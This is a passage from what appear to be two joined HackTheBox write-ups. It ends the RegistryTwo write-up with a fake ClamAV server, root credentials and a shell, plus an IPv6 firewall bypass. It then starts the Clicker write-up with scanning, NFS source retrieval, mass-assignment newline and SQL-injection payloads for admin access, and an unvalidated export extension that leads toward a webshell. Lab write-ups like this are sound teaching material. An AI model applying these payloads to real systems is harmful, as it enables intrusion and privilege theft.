developer@registry:/dev/shm$ ls quarantine-run-2024-01-31T15\:38\:49.284299160/
_root_iptables.sh
Including one with creds for Git just like developer:
developer@registry:/dev/shm$ cat ./quarantine-run-2024-01-31T15:38:30.581197496/_root_.git-credentials
https://admin:52nWqz3tejiImlbsihtV@github.com
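The .git-credentials format is one URL per line with the credentials embedded, so standard URL parsing pulls out the username and password; a quick sketch:

```python
from urllib.parse import urlsplit

# The quarantined credentials line from root's .git-credentials
line = "https://admin:52nWqz3tejiImlbsihtV@github.com"
parts = urlsplit(line)
print(parts.username, parts.password)  # admin 52nWqz3tejiImlbsihtV
```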
Making a Python socket server that will respond appropriately is a bit trickier. I need to understand the message that should come back in the response. The response is handled in ClamScan in the scanPath method, and passed into the constructor of a ScanResult object. It gets handled here:
public void setResult(String result) {
    this.result = result;
    if (result == null) {
        this.setStatus(Status.ERROR);
    } else if (result.contains(RESPONSE_OK)) {
        this.setStatus(Status.PASSED);
    } else if (result.endsWith(FOUND_SUFFIX)) {
        this.setSignature(result.substring(STREAM_PREFIX.length(), result.lastIndexOf(FOUND_SUFFIX) - 1));
    } else if (result.endsWith(ERROR_SUFFIX)) {
        this.setStatus(Status.ERROR);
    }
}
To get quarantined, I need the result to end with FOUND_SUFFIX so it doesn’t change the status, which is initialized to FAILED earlier. FOUND_SUFFIX is just “FOUND”. The result also has to be long enough, since the signature is extracted as a substring starting after the length of “stream: “.
With that in mind, and with a bit of help from ChatGPT, I’ll quickly create this Python server:
import socket
import threading

def handle_client(client_socket):
    data = client_socket.recv(4096).decode('utf-8')
    print(data)
    client_socket.send("stream: 0xdf FOUND".encode('utf-8'))
    client_socket.close()

def main():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 3310))
    server.listen(5)
    print("[*] Listening on port 3310")
    try:
        while True:
            client, address = server.accept()
            print("[*] Accepted connection from: {}:{}".format(address[0], address[1]))
            client_handler = threading.Thread(target=handle_client, args=(client,))
            client_handler.start()
    except KeyboardInterrupt:
        print("\n[*] Exiting...")
        server.close()

if __name__ == "__main__":
    main()
This handles all of /root in roughly 20-25 seconds, whereas the nc approach took over two minutes.
root is not allowed to SSH with a password, but those creds work with su to get a root shell:
developer@registry:/dev/shm$ su -
Password:
root@registry:~#
And the root flag:
root@registry:~# cat root.txt
9f2dc423************************
There are a few neat unintended paths that I’m aware of for RegistryTwo:
flowchart TD;
A[Enumeration]--Docker Registry-->B(hosting-app Image);
B--/..;/ and\nSessions Manipulation-->C(Admin Access);
C-->D(RMI Deserialization);
D-->E[Shell as app in Container];
E-->F(File Read on Host via RMI);
F-->G[Shell as Developer];
E-. ifconfig .->H(Find IPv6);
H-->F;
A--/..;/ and\nSessions File Read-->B;
B--/..;/ and\nSessions File Read-->H;
B--Shared Lab\nEnumeration-->H;
subgraph Legend
direction LR
start1[ ] --->|intended| stop1[ ]
style start1 height:0px;
style stop1 height:0px;
start2[ ] --->|unintended| stop2[ ]
style start2 height:0px;
style stop2 height:0px;
start3[ ] --->|TheATeam| stop3[ ]
style start3 height:0px;
style stop3 height:0px;
end
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 0,1,2,3,4,5,11 stroke-width:2px,stroke:#4B9CD3,fill:none;
linkStyle 6,13 stroke-width:2px,stroke:#FFFF99,fill:none,stroke-dasharray:3;
style Legend fill:#1d1d1d,color:#FFF;
It’s possible to skip the entire Docker Registry enumeration using the file read from the Sessions Example page. Enumeration already suggested this was a Java web application, but setting the editing file to /proc/self/cmdline confirms that it is Tomcat:
The page source shows that the data is loaded as a base64 blob and then decoded onto the page:
I’ll use that blob plus base64 -d and tr '\0' ' ' to decode this into a readable command line:
oxdf@hacky$ echo "L3Vzci9saWIvanZtL2phdmEtMS44LW9wZW5qZGsvanJlL2Jpbi9qYXZhAC1EamF2YS51dGlsLmxvZ2dpbmcuY29uZmlnLmZpbGU9L3Vzci9sb2NhbC90b21jYXQvY29uZi9sb2dnaW5nLnByb3BlcnRpZXMALURqYXZhLnV0aWwubG9nZ2luZy5tYW5hZ2VyPW9yZy5hcGFjaGUuanVsaS5DbGFzc0xvYWRlckxvZ01hbmFnZXIALURqZGsudGxzLmVwaGVtZXJhbERIS2V5U2l6ZT0yMDQ4AC1EamF2YS5wcm90b2NvbC5oYW5kbGVyLnBrZ3M9b3JnLmFwYWNoZS5jYXRhbGluYS53ZWJyZXNvdXJjZXMALURpZ25vcmUuZW5kb3JzZWQuZGlycz0ALWNsYXNzcGF0aAAvdXNyL2xvY2FsL3RvbWNhdC9iaW4vYm9vdHN0cmFwLmphcjovdXNyL2xvY2FsL3RvbWNhdC9iaW4vdG9tY2F0LWp1bGkuamFyAC1EY2F0YWxpbmEuYmFzZT0vdXNyL2xvY2FsL3RvbWNhdAAtRGNhdGFsaW5hLmhvbWU9L3Vzci9sb2NhbC90b21jYXQALURqYXZhLmlvLnRtcGRpcj0vdXNyL2xvY2FsL3RvbWNhdC90ZW1wAG9yZy5hcGFjaGUuY2F0YWxpbmEuc3RhcnR1cC5Cb290c3RyYXAAc3RhcnQA" | base64 -d | tr '\0' ' '
/usr/lib/jvm/java-1.8-openjdk/jre/bin/java -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dignore.endorsed.dirs= -classpath /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp org.apache.catalina.startup.Bootstrap start
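The same decode works in Python, which can be handy when the blob is too long to paste comfortably on a command line. This sketch uses a short illustrative blob built in place, not the real one from the page source:

```python
import base64

# Illustrative NUL-separated cmdline blob (not the real one above)
blob = base64.b64encode(b"/usr/bin/java\x00-jar\x00/opt/app.jar\x00")

# Decode and replace NUL separators with spaces, like tr '\0' ' '
decoded = base64.b64decode(blob).replace(b"\x00", b" ").decode().strip()
print(decoded)  # /usr/bin/java -jar /opt/app.jar
```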
Tomcat logs are stored in the Tomcat home directory under /logs as catalina.[YYYY]-[MM]-[DD].log. I’ll read the log for today, looking for when the server started. There’s this line:
26-Jan-2024 20:49:55.389 INFO [main] org.apache.catalina.startup.HostConfig.deployWAR Deploying web application archive [/usr/local/tomcat/webapps/hosting.war]
Updating the session variable one last time to the hosting.war path, the viewer is ugly:
But it is a PK = Zip (or War) file. I’ll grab the base64 blob from the source (it takes a while to load entirely) and decode it into the WAR.
I noticed above that 9002 was listening on IPv6, on all interfaces. In theory, I could connect directly to it from my host, but there’s an iptables rule blocking that. The script that sets this up is /root/iptables.sh:
#! /bin/bash
iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT -i enp0s8
iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT -i enp0s8
iptables -A INPUT -p tcp -m tcp --dport 5000 -j ACCEPT -i enp0s8
iptables -A INPUT -p tcp -m tcp --dport 5001 -j ACCEPT -i enp0s8
iptables -A INPUT -j DROP -i enp0s8
However, the IPv6 rules are not put in place. I’ll set the IP for registry.webhosting.htb to the IPv6 address of the host in my local hosts file:
dead:beef::250:56ff:feb9:a1e9 registry.webhosting.htb
10.10.11.223 www.webhosting.htb webhosting.htb
Then on IPv6, I’m able to talk directly to a lot more ports:
oxdf@hacky$ nmap -6 -p- --min-rate 10000 registry.webhosting.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-30 04:06 EST
Warning: dead:beef::250:56ff:feb9:a1e9 giving up on port because retransmission cap hit (10).
Nmap scan report for registry.webhosting.htb (dead:beef::250:56ff:feb9:a1e9)
Host is up (0.11s latency).
Not shown: 61226 closed ports, 4299 filtered ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
3306/tcp open mysql
3310/tcp open dyna-access
5000/tcp open upnp
5001/tcp open commplex-link
8009/tcp open ajp13
8080/tcp open http-proxy
9002/tcp open dynamid
37549/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.69 seconds
When jkr and TheATeam got root blood on RegistryTwo, they actually noticed this after getting a foothold on the box but before getting root, and used it to make development of the RMI client easier, avoiding having to upload a JAR each time while getting the program working. However, it is possible to shortcut the entire foothold using this if I can leak the IPv6 address of the host.
There are nice methods for enumerating IPv6 addresses of other hosts on the same network that work in shared HTB labs. Ippsec has a great primer on this that I won’t recreate here. I will show how to do it via the Sessions Example file read.
I showed above how I could use the Sessions Example page to set the file that loads in the editor to whatever file I want. I’ll set it to /proc/net/if_inet6:
On refreshing the editor, I get the file:
I can grab the address for eth0 and work with it from there.
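Each line of /proc/net/if_inet6 starts with the address as 32 hex digits and no separators, so it needs to be converted back to colon notation before it can go in a hosts file. Python’s ipaddress module handles this; the sample line below is illustrative:

```python
import ipaddress

# Illustrative line as it might appear in /proc/net/if_inet6:
# address, index, prefix length, scope, flags, interface name
line = "deadbeef00000000025056fffeb9a1e9 02 40 00 80 eth0"

hex_addr = line.split()[0]
addr = ipaddress.IPv6Address(bytes.fromhex(hex_addr))
print(addr)  # dead:beef::250:56ff:feb9:a1e9
```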
The website allows users to create “domains” which it then handles as virtual hosts. I’ve already looked at the /sites directory. Each “domain” has a folder, including www:
root@registry:/sites# ls
www.static-482f6175cb85.webhosting.htb www.static-68d01707c93f.webhosting.htb www.static-e492442a4be9.webhosting.htb
www.static-5403e43655a0.webhosting.htb www.static-950ba61ab119.webhosting.htb www.static-e511acc71eed.webhosting.htb
www.static-5762637d572b.webhosting.htb www.static-c0a4a2cfd9ce.webhosting.htb www.static-f7200b8c1225.webhosting.htb
www.static-5a9d1f63c28c.webhosting.htb www.static-dd1305ddf270.webhosting.htb www.webhosting.htb
The nginx config is in /etc/nginx/sites-enabled/default:
server {
    listen 443 ssl;
    listen [::]:443 ssl;

    include snippets/self-signed.conf;
    include snippets/ssl-params.conf;

    if (!-d /sites/$http_host) {
        rewrite . https://www.webhosting.htb/ redirect;
    }

    root /sites/$http_host;
    server_name $http_host;
    index index.html index.htm index.nginx-debian.html;
    server_name _;

    location / {
        try_files $uri $uri/ =404;
    }

    location /hosting/ {
        proxy_set_header X-Forwarded-Host $host;
        proxy_set_header X-Forwarded-Server $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://127.0.0.1:8080/hosting/;
    }
}
This is a neat nginx config. $http_host is the value in the Host HTTP header. The if (!-d /sites/$http_host) block checks whether a folder exists for that host, and if not, returns a redirect to www.webhosting.htb. Then it sets the HTTP root to /sites/$http_host. It’s quite simple, but still very clever.
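That routing can be sketched in Python to make the flow concrete (the function name and redirect string here are my own illustration, not part of the real config):

```python
import os

def resolve_root(http_host, sites_dir="/sites"):
    # Mirror of the nginx logic: if no directory exists for the Host
    # header value, redirect to the main site; otherwise serve from it.
    site_dir = os.path.join(sites_dir, http_host)
    if not os.path.isdir(site_dir):
        return "redirect:https://www.webhosting.htb/"
    return site_dir

print(resolve_root("www.static-c0a4a2cfd9ce.webhosting.htb"))
```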
Anything under the /hosting/ path is forwarded to 127.0.0.1:8080, which is actually another Docker container that runs the hosting-app.
Clicker has a website that presents a game that is a silly version of Universal Paperclips. I’ll find a mass assignment vulnerability that allows me to change my role to admin after bypassing a filter two different ways (newline injection and SQLI). Then I’ll exploit a file write vulnerability to get a webshell and execution on the box. To escalate, I’ll find a SetUID binary for the next user and abuse it to read their SSH key. To get root, I’ll exploit a script the user can run with sudo, showing three different ways (playing with Perl environment variables, setting myself as the proxy and adding an XXE attack, and abusing LD_PRELOAD).
Name | Clicker Play on HackTheBox |
---|---|
Release Date | 23 Sep 2023 |
Retire Date | 27 Jan 2024 |
OS | Linux |
Base Points | Medium [30] |
Rated Difficulty | |
Radar Graph | |
00:55:29 | |
01:17:23 | |
Creator |
nmap finds nine open TCP ports: SSH (22), HTTP (80), and seven related to NFS:
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.232
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 00:19 EST
Nmap scan report for 10.10.11.232
Host is up (0.11s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
36257/tcp open unknown
36645/tcp open unknown
39989/tcp open unknown
42059/tcp open unknown
54001/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 7.19 seconds
oxdf@hacky$ nmap -p 22,80,111,2049,36257,36645,39989,42059,54001 -sCV 10.10.11.232
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 00:26 EST
Nmap scan report for 10.10.11.232
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36257/tcp mountd
| 100005 1,2,3 48115/tcp6 mountd
| 100005 1,2,3 55791/udp mountd
| 100005 1,2,3 55895/udp6 mountd
| 100021 1,3,4 33747/udp nlockmgr
| 100021 1,3,4 35015/tcp6 nlockmgr
| 100021 1,3,4 39989/tcp nlockmgr
| 100021 1,3,4 40338/udp6 nlockmgr
| 100024 1 41396/udp status
| 100024 1 42059/tcp status
| 100024 1 45838/udp6 status
| 100024 1 49747/tcp6 status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
36257/tcp open mountd 1-3 (RPC #100005)
36645/tcp open mountd 1-3 (RPC #100005)
39989/tcp open nlockmgr 1-4 (RPC #100021)
42059/tcp open status 1 (RPC #100024)
54001/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds
Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 22.04 jammy. The webserver returns a redirect to clicker.htb. All the RPC ports seem to be related to NFS.
Given the use of the domain name clicker.htb, I’ll use ffuf to look for any subdomains that respond differently.
oxdf@hacky$ ffuf -u http://10.10.11.232 -H "Host: FUZZ.clicker.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.232
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.clicker.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
www [Status: 200, Size: 2984, Words: 686, Lines: 108, Duration: 3488ms]
#www [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 109ms]
#mail [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 110ms]
:: Progress: [19966/19966] :: Job [1/1] :: 365 req/sec :: Duration: [0:00:58] :: Errors: 0 ::
www is worth checking out. The other two seem like errors. I’ll add these to my /etc/hosts file:
10.10.11.232 clicker.htb www.clicker.htb
Some quick manual tests show that the two domains return the same pages. As root later I can confirm this in /etc/apache2/sites-enabled/clicker.htb.conf:
<VirtualHost *:80>
ServerName clicker.htb
ServerAlias www.clicker.htb
ServerAdmin webmaster@localhost
DocumentRoot /var/www/clicker.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
The ServerAlias directive sets www.clicker.htb to be served the same as clicker.htb.
The website is for an old-school looking game called Clicker:
The Info link (/info.php) just has some quotes from players. The Login link (/login.php) has a login form, and the Register link (/register.php) has a registration form:
Once I register and log in, there’s a game to play that’s just clicking to get “clicks”, and then spending clicks to level up and get more clicks per click:
It seems like a simple version of the Universal Paperclips game. The game is very easy to cheat in the browser dev tools:
It can lead to some wonky results:
The site is clearly built on PHP. All the clicking and scoring is done locally in JavaScript. Clicking “Save and close” actually sends the current numbers to the server as a GET request:
That redirects to /index.php?msg=Game has been saved!.
Sending really large numbers crashes it:
I’ll run feroxbuster against the site, and include -x php since I know the site is PHP:
oxdf@hacky$ feroxbuster -u http://clicker.htb -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://clicker.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 107l 277w 2984c http://clicker.htb/
301 GET 9l 28w 311c http://clicker.htb/assets => http://clicker.htb/assets/
200 GET 127l 319w 3343c http://clicker.htb/info.php
302 GET 0l 0w 0c http://clicker.htb/export.php => http://clicker.htb/index.php
301 GET 9l 28w 315c http://clicker.htb/assets/css => http://clicker.htb/assets/css/
301 GET 9l 28w 314c http://clicker.htb/assets/js => http://clicker.htb/assets/js/
302 GET 0l 0w 0c http://clicker.htb/admin.php => http://clicker.htb/index.php
200 GET 114l 266w 3253c http://clicker.htb/register.php
302 GET 0l 0w 0c http://clicker.htb/logout.php => http://clicker.htb/index.php
200 GET 114l 266w 3221c http://clicker.htb/login.php
302 GET 0l 0w 0c http://clicker.htb/profile.php => http://clicker.htb/index.php
200 GET 107l 277w 2984c http://clicker.htb/index.php
302 GET 0l 0w 0c http://clicker.htb/play.php => http://clicker.htb/index.php
301 GET 9l 28w 312c http://clicker.htb/exports => http://clicker.htb/exports/
200 GET 0l 0w 0c http://clicker.htb/authenticate.php
401 GET 0l 0w 0c http://clicker.htb/diagnostic.php
[####################] - 4m 150000/150000 0s found:16 errors:1070
[####################] - 4m 30000/30000 124/s http://clicker.htb/
[####################] - 4m 30000/30000 123/s http://clicker.htb/assets/
[####################] - 4m 30000/30000 124/s http://clicker.htb/assets/css/
[####################] - 4m 30000/30000 124/s http://clicker.htb/assets/js/
[####################] - 3m 30000/30000 128/s http://clicker.htb/exports/
admin.php is interesting, but even logged in it just redirects to the main page, likely requiring an admin account.
showmount -e will enumerate the available NFS shares:
oxdf@hacky$ showmount -e clicker.htb
Export list for clicker.htb:
/mnt/backups *
There’s one share named backups. I’ll mount it on my host:
oxdf@hacky$ sudo mount -t nfs clicker.htb:/mnt/backups /mnt
oxdf@hacky$ ls /mnt/
clicker.htb_backup.zip
The zip has the source code for the website:
oxdf@hacky$ unzip clicker.htb_backup.zip
Archive: clicker.htb_backup.zip
creating: clicker.htb/
inflating: clicker.htb/play.php
inflating: clicker.htb/profile.php
inflating: clicker.htb/authenticate.php
inflating: clicker.htb/create_player.php
inflating: clicker.htb/logout.php
creating: clicker.htb/assets/
inflating: clicker.htb/assets/background.png
inflating: clicker.htb/assets/cover.css
inflating: clicker.htb/assets/cursor.png
creating: clicker.htb/assets/js/
inflating: clicker.htb/assets/js/bootstrap.js.map
inflating: clicker.htb/assets/js/bootstrap.bundle.min.js.map
inflating: clicker.htb/assets/js/bootstrap.min.js.map
inflating: clicker.htb/assets/js/bootstrap.bundle.min.js
inflating: clicker.htb/assets/js/bootstrap.min.js
inflating: clicker.htb/assets/js/bootstrap.bundle.js
inflating: clicker.htb/assets/js/bootstrap.bundle.js.map
inflating: clicker.htb/assets/js/bootstrap.js
creating: clicker.htb/assets/css/
inflating: clicker.htb/assets/css/bootstrap-reboot.min.css
inflating: clicker.htb/assets/css/bootstrap-reboot.css
inflating: clicker.htb/assets/css/bootstrap-reboot.min.css.map
inflating: clicker.htb/assets/css/bootstrap.min.css.map
inflating: clicker.htb/assets/css/bootstrap.css.map
inflating: clicker.htb/assets/css/bootstrap-grid.css
inflating: clicker.htb/assets/css/bootstrap-grid.min.css.map
inflating: clicker.htb/assets/css/bootstrap-grid.min.css
inflating: clicker.htb/assets/css/bootstrap.min.css
inflating: clicker.htb/assets/css/bootstrap-grid.css.map
inflating: clicker.htb/assets/css/bootstrap.css
inflating: clicker.htb/assets/css/bootstrap-reboot.css.map
inflating: clicker.htb/login.php
inflating: clicker.htb/admin.php
inflating: clicker.htb/info.php
inflating: clicker.htb/diagnostic.php
inflating: clicker.htb/save_game.php
inflating: clicker.htb/register.php
inflating: clicker.htb/index.php
inflating: clicker.htb/db_utils.php
creating: clicker.htb/exports/
inflating: clicker.htb/export.php
I’ll give the highlights of the web source, going over what is needed for exploitation to gain a foothold. There’s also a file, diagnostic.php, that doesn’t matter now but will play a role in the escalation to root.
I’ll open the directory of files in VSCode and let the Snyk plugin scan the code. It finds potential XSS in a bunch of pages, hardcoded creds for the database, and the use of MD5:
The XSS alerts are all due to the way the site passes error messages through GET parameters. None of these seem likely to be useful to me.
The admin panel starts with a check that the user’s ROLE is “Admin”:
<?php
session_start();
include_once("db_utils.php");
if ($_SESSION["ROLE"] != "Admin") {
header('Location: /index.php');
die;
}
?>
After that, there’s a mostly static page that calls get_top_players and makes a table:
get_top_players is defined in db_utils.php.
There is an HTML form that sends a POST request to export.php with the threshold and a selection of format as txt, json, or html:
export.php also does an admin role check at the start:
<?php
session_start();
include_once("db_utils.php");
if ($_SESSION["ROLE"] != "Admin") {
header('Location: /index.php');
die;
}
It builds output into a string as text, JSON, or HTML. HTML is the default rather than explicitly checking that the selection is html:
$threshold = 1000000;
if (isset($_POST["threshold"]) && is_numeric($_POST["threshold"])) {
$threshold = $_POST["threshold"];
}
$data = get_top_players($threshold);
$currentplayer = get_current_player($_SESSION["PLAYER"]);
$s = "";
if ($_POST["extension"] == "txt") {
$s .= "Nickname: ". $currentplayer["nickname"] . " Clicks: " . $currentplayer["clicks"] . " Level: " . $currentplayer["level"] . "\n";
foreach ($data as $player) {
$s .= "Nickname: ". $player["nickname"] . " Clicks: " . $player["clicks"] . " Level: " . $player["level"] . "\n";
}
} elseif ($_POST["extension"] == "json") {
$s .= json_encode($currentplayer);
$s .= json_encode($data);
} else {
$s .= '<table>';
$s .= '<thead>';
$s .= ' <tr>';
$s .= ' <th scope="col">Nickname</th>';
$s .= ' <th scope="col">Clicks</th>';
$s .= ' <th scope="col">Level</th>';
$s .= ' </tr>';
$s .= '</thead>';
$s .= '<tbody>';
$s .= ' <tr>';
$s .= ' <th scope="row">' . $currentplayer["nickname"] . '</th>';
$s .= ' <td>' . $currentplayer["clicks"] . '</td>';
$s .= ' <td>' . $currentplayer["level"] . '</td>';
$s .= ' </tr>';
foreach ($data as $player) {
$s .= ' <tr>';
$s .= ' <th scope="row">' . $player["nickname"] . '</th>';
$s .= ' <td>' . $player["clicks"] . '</td>';
$s .= ' <td>' . $player["level"] . '</td>';
$s .= ' </tr>';
}
$s .= '</tbody>';
$s .= '</table>';
}
Then it writes the output to a file and returns the location:
$filename = "exports/top_players_" . random_string(8) . "." . $_POST["extension"];
file_put_contents($filename, $s);
header('Location: /admin.php?msg=Data has been saved in ' . $filename);
save_game.php is one of the first places (besides registration and login) where the site interacts with the database. It checks that the user is logged in, and then checks that there is no GET parameter named role (in any casing):
<?php
session_start();
include_once("db_utils.php");
if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {
$args = [];
foreach($_GET as $key=>$value) {
if (strtolower($key) === 'role') {
// prevent malicious users to modify role
header('Location: /index.php?err=Malicious activity detected!');
die;
}
$args[$key] = $value;
}
save_profile($_SESSION['PLAYER'], $_GET);
// update session info
$_SESSION['CLICKS'] = $_GET['clicks'];
$_SESSION['LEVEL'] = $_GET['level'];
header('Location: /index.php?msg=Game has been saved!');
}
?>
The comment shows that even the author is aware that this is a potential mass assignment vulnerability. The $_GET is passed into save_profile, which is also in db_utils.php.
save_profile uses the passed-in GET parameters to build an SQL string, and updates the player:
function save_profile($player, $args) {
global $pdo;
$params = ["player"=>$player];
$setStr = "";
foreach ($args as $key => $value) {
$setStr .= $key . "=" . $pdo->quote($value) . ",";
}
$setStr = rtrim($setStr, ",");
$stmt = $pdo->prepare("UPDATE players SET $setStr WHERE username = :player");
$stmt -> execute($params);
}
The player is passed as a prepared-statement parameter, and the developer uses $pdo->quote() to prevent SQL injection in the values.
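To make the asymmetry concrete, here’s a minimal Python simulation of how save_profile assembles its query (hypothetical names, with PDO’s quote() approximated) — values get quoted, but keys are concatenated raw:

```python
def pdo_quote(value):
    # Rough stand-in for PDO::quote(): wrap in single quotes, escape embedded quotes
    return "'" + str(value).replace("'", "''") + "'"

def build_update(args):
    """Simulate save_profile(): keys go into the SQL raw, values are quoted."""
    set_str = ",".join(f"{key}={pdo_quote(value)}" for key, value in args.items())
    return f"UPDATE players SET {set_str} WHERE username = :player"

print(build_update({"clicks": "4", "level": "0"}))
# UPDATE players SET clicks='4',level='0' WHERE username = :player
```

A single quote in a value gets escaped, but nothing sanitizes the keys — that asymmetry is what the bypasses below abuse.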
While the GET request to save_game.php only sends two parameters, clicks and level, any that are passed to save_profile will be saved. Looking at the create_new_player function, there are at least the following columns in the players table:
$stmt = $pdo->prepare("INSERT INTO players(username, nickname, password, role, clicks, level) VALUES (:player,:player,:password,'User',0,0)");
This means I can easily change my username, nickname, or password via this mass assignment by just adding &username=new0xdf to the end of the URL. Messing with username risks breaking things, as I could end up with a non-unique username, which is used as a key at times in the site. Similarly, if I set the password to a non-hashed value, it would make that account impossible to log in to.
I’m not able to change my role in this same manner, as that will be caught at the top of save_game.php and return the message “Malicious activity detected!”.
There are a couple of ways to bypass this filter. I’ll show two (yellow being the intended path):
flowchart TD;
A[Mass Assignment]-->B(#34;role#34; Filtered);
B-->C(Newline or comment\ninjection in parameter);
B-->D(SQL Injection in parameter);
C-->E[Admin role];
D-->E
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 1,3 stroke-width:2px,stroke:#4B9CD3,fill:none;
The easiest way to bypass this check is with a newline injection in the parameter name. SQL is very forgiving of whitespace (it’s often best practice to break long queries across lines). So if I make the parameter role%0a=Admin, the check strtolower($key) === 'role' won’t return true. When it gets to save_profile, it will generate the following SQL:
UPDATE players SET clicks='4',level='0',role
='Admin' WHERE username = "0xdf";
While the whitespace looks a bit odd, it works perfectly fine:
The $_SESSION['ROLE'] value is only set on login, but after logging out and back in:
There are other variations on this as well, such as role/**/, which adds the start and close of an SQL comment.
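A quick Python sketch (simulating the PHP strtolower($key) === 'role' comparison, not the site’s actual code) shows why these variants slip through:

```python
def is_blocked(key):
    # Mirrors the PHP filter: strtolower($key) === 'role'
    return key.lower() == "role"

print(is_blocked("Role"))      # True - casing doesn't help
print(is_blocked("role\n"))    # False - trailing newline survives lower()
print(is_blocked("role/**/"))  # False - SQL comment variant
```

MySQL then treats role followed by a newline or /**/ as just role once the key lands in the UPDATE statement.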
The other way to bypass the role check is using SQL injection. I noted that both the player name and the values are protected against SQLi. However, the keys are not. The default parameters of clicks=4&level=0 result in the following SQL:
If I change the clicks parameter to role='Admin',clicks (and URL-encode it so that it reaches PHP as one parameter name), the lowercased key role='admin',clicks doesn’t match role, so the filter passes, and the SQL becomes:
UPDATE players SET role='Admin',clicks='4',level='0' WHERE username = "0xdf";
It bypasses the filter:
And results in admin access after logging out and back in.
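The resulting query can be sketched the same way (a hypothetical simulation, with PDO’s quote() approximated): the injected key passes the filter yet rewrites the SET clause:

```python
def build_update(args):
    """Simulate save_profile(): keys raw, values quoted."""
    quote = lambda v: "'" + str(v).replace("'", "''") + "'"
    set_str = ",".join(f"{k}={quote(v)}" for k, v in args.items())
    return f"UPDATE players SET {set_str} WHERE username = :player"

# The key "role='Admin',clicks" doesn't equal "role" when lowercased,
# so the filter passes, but it injects straight into the SQL:
print(build_update({"role='Admin',clicks": "4", "level": "0"}))
# UPDATE players SET role='Admin',clicks='4',level='0' WHERE username = :player
```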
As admin, I have access to the “Top Players” table, with an option to export in various formats, as observed in the source:
When I do the export, it reports the path:
And that link has it:
It’s interesting that the output adds the current player whether or not they meet the threshold.
The issue in the export.php code is that it takes the user input for the format and uses it as the file extension without validating that it’s one of the three allowed formats. Further, because the if/elseif/else structure doesn’t explicitly check the html case, it uses HTML for anything that isn’t txt or json.
That means I can write a PHP file:
The table that’s output as HTML has only the nickname, clicks, and level fields:
$s .= ' <tr>';
$s .= ' <th scope="row">' . $currentplayer["nickname"] . '</th>';
$s .= ' <td>' . $currentplayer["clicks"] . '</td>';
